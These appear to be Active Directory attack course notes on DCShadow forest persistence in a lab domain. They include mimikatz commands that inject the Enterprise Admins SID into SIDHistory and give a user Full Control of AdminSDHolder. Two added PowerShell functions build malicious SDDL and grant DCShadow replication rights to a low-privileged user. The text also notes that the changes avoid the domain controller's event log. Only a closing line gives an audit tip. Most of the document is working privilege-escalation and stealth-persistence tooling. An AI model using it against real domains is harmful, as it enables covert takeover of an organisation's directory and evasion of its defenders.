Forest Persistence
DCShadow
• We can use mimikatz for DCShadow. Two mimikatz instances are required:
• One to start the RPC servers with SYSTEM privileges and specify the attribute to be modified:
!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"
• And a second one with enough privileges (DA or otherwise) to push the values:
lsadump::dcshadow /push
• DCShadow can be used with minimal permissions by modifying the ACLs of:
– The domain object:
• DS-Install-Replica (Add/Remove Replica in Domain)
• DS-Replication-Manage-Topology (Manage Replication Topology)
• DS-Replication-Synchronize (Replication Synchronization)
– The Sites object (and its children) in the Configuration container:
• CreateChild and DeleteChild
– The object of the computer which is registered as a DC:
• WriteProperty (Not Write)
– The target object:
• WriteProperty (Not Write)
• We can use Set-DCShadowPermissions from Nishang for setting the
permissions.
• For example, to use DCShadow as user student1 to modify the root1user object from machine mcorp-student1:
Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose
• Now the second mimikatz instance (the one running as DA) is not required: the push can be done as student1.
• Once the permissions are sorted out, many interesting things can be done.
• For example, set the SIDHistory of a user account to the Enterprise Admins or Domain Admins group (RID 519 is Enterprise Admins, RID 512 would be Domain Admins):
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519
• To do the above without DA, the permissions are set on the student1 object this time (it is the target of the modification):
Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName student1 -Username student1 -Verbose
• Modify the ntSecurityDescriptor of AdminSDHolder to add Full Control for a user. First read the current descriptor in SDDL form:
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl
• We just need to append a copy of one of the Full Control ACEs from the output above (the ones for SY/BA/DA) with our user's SID at the end, and push the result:
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<modified ACL>
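Building the <modified ACL> value by hand is error-prone, and a malformed SDDL only fails at push time. The following PowerShell is an added example, not code from the original slides or from mimikatz: it parses the SDDL read above with .NET, clones the existing allow ACE of Domain Admins (SID ending in -512) for our user, appends it at the end of the DACL and returns the new SDDL. The function name, the sample SDDL (constructed, with explicit SIDs instead of the DA alias so it parses on a non-domain-joined host as well) and the user SID are assumptions for illustration.

```powershell
function Add-FullControlAce {
    param(
        [Parameter(Mandatory)][string]$Sddl,      # current ntSecurityDescriptor as SDDL
        [Parameter(Mandatory)][string]$UserSid    # SID of the user to be given Full Control
    )
    # .NET parses the SDDL here, so a typo in the input is caught before any DCShadow push
    $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    $sid = New-Object System.Security.Principal.SecurityIdentifier($UserSid)

    # Template: the allow ACE for Domain Admins (RID 512). The SY (S-1-5-18) or BA (S-1-5-32-544)
    # ACE would do equally well, as the slide says; the access mask is what we want to copy.
    $template = $sd.DiscretionaryAcl | Where-Object {
        $_ -is [System.Security.AccessControl.CommonAce] -and
        $_.AceQualifier -eq [System.Security.AccessControl.AceQualifier]::AccessAllowed -and
        $_.SecurityIdentifier.Value.EndsWith('-512')
    } | Select-Object -First 1
    if (-not $template) { throw 'No Domain Admins allow ACE found in the DACL' }

    # Same rights and flags, new trustee; appended at the end of the DACL
    $ace = New-Object System.Security.AccessControl.CommonAce(
        $template.AceFlags, $template.AceQualifier, $template.AccessMask, $sid, $false, $null)
    $sd.DiscretionaryAcl.InsertAce($sd.DiscretionaryAcl.Count, $ace)
    return $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
}

# Constructed sample standing in for the live value returned by .psbase.ObjectSecurity.sddl above
# (assumed SIDs; explicit SIDs are used instead of the DA alias so it parses on any Windows host)
$sample = 'O:S-1-5-32-544G:S-1-5-32-544D:PAI' +
          '(A;;RPWPCRCCDCLCLORCWOWDSW;;;S-1-5-32-544)' +
          '(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-280534878-1496970234-700767426-512)' +
          '(A;;RPWPCRCCDCLCLORCWOWDSW;;;S-1-5-18)' +
          '(A;;LCRPLORC;;;AU)'
$modified = Add-FullControlAce -Sddl $sample -UserSid 'S-1-5-21-280534878-1496970234-700767426-1104'
$modified   # pass this string as the /value: of the lsadump::dcshadow push
```

The returned string is re-serialized by .NET, so well-known SIDs may come back as aliases (BA, SY, AU) and the ACE order is preserved with the new ACE last. Pushing it through DCShadow, rather than writing it with LDAP, is what keeps the change out of the DC's own event log.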
• We can even run DCShadow from DCShadow, which I have named Shadowception: instead of Set-DCShadowPermissions, a DCShadow push (done once as DA) writes the ACEs that grant the DCShadow permissions to our user. First read the current SDDL of the domain object:
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl
• We need to append the following ACEs with our user's SID at the end:
– On the domain object (the three control-access rights listed earlier: 1131f6ac is DS-Replication-Manage-Topology, 9923a32a is DS-Install-Replica, 1131f6ab is DS-Replication-Synchronize):
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
– On the attacker computer object:
(A;;WP;;;UserSID)
– On the target user object:
(A;;WP;;;UserSID)
– On the Sites object in the Configuration container (CI makes it inheritable by the children):
(A;CI;CCDC;;;UserSID)
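The four ACL changes above (domain object, Sites container, fake DC computer object, target object) are what Set-DCShadowPermissions performs. The following PowerShell is an added example of doing the same with System.DirectoryServices directly; it is not Nishang's code and not part of the original slides. It must be run once with rights to edit those ACLs (DA in the lab); afterwards the DCShadow push works as the low-privileged user. The function name, the use of RootDSE to find the naming contexts, and the DNs and SID in the usage comment are assumptions for illustration; the GUIDs are the ones in the ACE list above.

```powershell
function Grant-DCShadowPermissions {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$UserSid,     # SID of the account that will run DCShadow
        [Parameter(Mandatory)][string]$FakeDCDN,    # DN of the computer object registered as a DC
        [Parameter(Mandatory)][string]$TargetDN     # DN of the object DCShadow will modify
    )
    $sid   = New-Object System.Security.Principal.SecurityIdentifier($UserSid)
    $allow = [System.Security.AccessControl.AccessControlType]::Allow
    $none  = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
    $all   = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All

    # Naming contexts from RootDSE, so the Sites container is found even from a child domain
    $rootDse  = New-Object System.DirectoryServices.DirectoryEntry('LDAP://RootDSE')
    $domainDN = $rootDse.Properties['defaultNamingContext'].Value
    $configDN = $rootDse.Properties['configurationNamingContext'].Value

    # 1. Domain object: the three control-access (extended) rights. Each becomes an
    #    (OA;;CR;<guid>;;<sid>) ACE, the SDDL form shown in the list above.
    $replicationRights = @{
        'DS-Install-Replica'             = '9923a32a-3607-11d2-b9be-0000f87a36b2'
        'DS-Replication-Manage-Topology' = '1131f6ac-9c07-11d1-f79f-00c04fc2dcd2'
        'DS-Replication-Synchronize'     = '1131f6ab-9c07-11d1-f79f-00c04fc2dcd2'
    }
    $domain = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$domainDN")
    foreach ($right in $replicationRights.GetEnumerator()) {
        $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
            $sid, [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight, $allow,
            [guid]$right.Value, $none)
        $domain.psbase.ObjectSecurity.AddAccessRule($rule)
        Write-Verbose "Domain object: granted $($right.Key) to $UserSid"
    }
    $domain.psbase.CommitChanges()

    # 2. Sites container and its children: CreateChild + DeleteChild, inheritable
    #    (the CI flag in (A;CI;CCDC;;;<sid>))
    $sites = New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Sites,$configDN")
    $rule  = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $sid,
        ([System.DirectoryServices.ActiveDirectoryRights]::CreateChild -bor
         [System.DirectoryServices.ActiveDirectoryRights]::DeleteChild),
        $allow, $all)
    $sites.psbase.ObjectSecurity.AddAccessRule($rule)
    $sites.psbase.CommitChanges()
    Write-Verbose "Sites container: granted CreateChild/DeleteChild to $UserSid"

    # 3 and 4. Fake DC computer object and the target object: WriteProperty only, not Write
    #    ((A;;WP;;;<sid>) on each)
    foreach ($dn in @($FakeDCDN, $TargetDN)) {
        $obj  = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dn")
        $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
            $sid, [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty, $allow, $none)
        $obj.psbase.ObjectSecurity.AddAccessRule($rule)
        $obj.psbase.CommitChanges()
        Write-Verbose "${dn}: granted WriteProperty to $UserSid"
    }
}

# Usage for the lab on this page (SID and DNs are assumed; look them up with Get-ADUser / Get-ADComputer):
# Grant-DCShadowPermissions -UserSid 'S-1-5-21-280534878-1496970234-700767426-1104' `
#     -FakeDCDN 'CN=MCORP-STUDENT1,CN=Computers,DC=moneycorp,DC=local' `
#     -TargetDN 'CN=root1user,CN=Users,DC=moneycorp,DC=local' -Verbose
```

Reading back `.psbase.ObjectSecurity.sddl` on each of the four objects afterwards should show exactly the ACEs listed above with the user's SID, which is also a quick way to audit a domain for leftover DCShadow permissions: an (OA;;CR;...) ACE for any of these three GUIDs granted to a plain user on the domain object has no legitimate reason to exist.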